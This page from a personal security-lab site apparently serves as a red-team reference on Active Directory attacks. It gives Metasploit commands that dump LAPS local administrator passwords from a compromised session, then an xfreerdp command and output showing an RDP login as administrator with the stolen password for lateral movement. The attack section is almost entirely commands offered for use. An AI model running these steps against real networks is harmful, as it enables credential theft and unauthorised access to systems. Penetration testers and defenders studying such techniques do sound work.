AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page

Was this helpful?

  1. Offensive Cyberz
  2. AD Attack

LAPS Reader

If user is in PswReaders group, then you can read LAPS passwords. To abuse this with a metasploit shell:

use windows/gather/credentials/enum_laps
msf5 post(windows/gather/credentials/enum_laps) > set session #
session => #
msf5 post(windows/gather/credentials/enum_laps) > run

Enumerate hosts that you have the local admin password to and move laterally based on open connections. For example: (RDP)

xfreerdp /u:administrator /v:192.168.X.Y /w:1200 /h:1000
[10:57:29:033] [36184:36185] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
Password: LAPSpassword
PreviousPrompt for CredentialsNextAbusing ACLs

Last updated 3 years ago

Was this helpful?